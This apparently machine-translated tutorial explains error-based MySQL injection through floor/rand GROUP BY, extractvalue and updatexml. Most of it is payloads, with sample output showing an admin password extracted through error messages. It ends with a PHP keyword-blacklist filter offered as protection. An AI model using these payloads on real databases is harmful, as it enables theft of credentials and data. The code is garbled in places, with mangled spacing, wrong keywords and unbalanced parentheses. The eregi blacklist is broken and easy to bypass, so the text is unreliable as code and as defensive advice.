A detailed analysis of three kinds of error modes used in MySQL injection

1, through floor error

You can use the following code

The code is as follows	Copy Code
and select 1 from (SELECT COUNT (*), concat (version (), Floor (rand (0) *2)) x to Information_schema.tables Group by X); and (select COUNT (*) from (SELECT 1 Union SELECT NULL UNION SELECT! 1) x GROUP BY CONCAT (select table_name from Informati On_schema.tables limit 1), Floor (rand (0) *2));

Examples are as follows:
Start with the normal query:

The code is as follows	Copy Code
Mysql> SELECT * FROM article where id = 1; +----+-------+---------+ | ID | Title | Content | +----+-------+---------+ | 1 | Test | Do It | +----+-------+---------+

If the ID input exists, you can make an error with the following statement.

The code is as follows	Copy Code
Mysql> SELECT * FROM article WHERE id = 1 and (select 1 from (SELECT COUNT (*), concat (version (), Floor (rand (0) *2)) x from Information_schema.tables GROUP by X) a); ERROR 1062 (23000): Duplicate entry ' 5.1.33-community-log1 ' for key ' Group_key '

You can see a successful version of MySQL, and if you need to query for additional data, you can query by modifying the location statement of version ().
For example, we need to query the administrator username and password:

code is as follows

copy code

Method1: Mysql> SELECT * FROM article WHERE id = 1 and (select 1 from  (SELECT COUNT (*), concat ((select pass from admin where id  =1), Floor (rand (0) *2)) x from Information_schema.tables Group by x); ERROR 1062 (23000): Duplicate entry ' admin8881 ' for key ' Group_key ' Method2: Mysql> SELECT * FROM article WHERE id = 1 and (select COUNT (*)   from (select 1 Union SELECT NULL UNION SELECT!) 1) x Group by  concat (select pass from admin limit 1), Floor (rand (0) *2)); ERROR 1062 (23000): Duplicate entry ' admin8881 ' for key ' Group_key '

2, Extractvalue

The test statement is as follows

The code is as follows	Copy Code
and Extractvalue (1, concat (0X5C, (select table_name from information_schema.tables limit 1));

Actual test process

The code is as follows	Copy Code
Mysql> SELECT * FROM article WHERE id = 1 and extractvalue (1, concat (0x5c, (select pass from admin limit 1)); Error 1105 (HY000): XPATH syntax error: ' admin888 '

3, Updatexml

Test statement

The code is as follows	Copy Code
and 1= (Updatexml (1,concat 0x5e24, (select User ()), 0x5e24), 1)

Actual test process

The code is as follows	Copy Code
Mysql> SELECT * FROM article WHERE id = 1 and 1= (Updatexml (1,concat (0x5e24, (select pass from admin limit 1), 0x5e24), 1) ; Error 1105 (HY000): XPATH syntax error: ' ^ $admin 888^$ '

One of the characteristics of the above method is that the query statement is very long and we can limit the input length, which can be effectively filtered but SQL injection, I would like to share an anti-SQL injection function.

1. Construction of functions

The code is as follows

Copy Code

/* Function name: Inject_check () Function: Detect the submitted value contains SQL injected characters, prevent injection, protect server security Parameters: $sql _STR: Submitted variables Return value: Returns the detection result, ture or False */ function Inject_check ($sql _str) { Return eregi (' select|insert|update|delete| ' | /*|*|.. /|.    /|union|into|load_file|outfile ', $sql _str); To filter }

2. Use instances of functions

The code is as follows	Copy Code
<?php if (Inject_check ($_get[' id ')) { Exit (' You submit the data illegally, please check and resubmit! '); } Else { $id = $_get[' id ']; Working with data .......... } ?>

More about SQL anti-injection indeed PHP tutorial we can refer to http://www.111cn.net/phper/phpanqn/37379.htm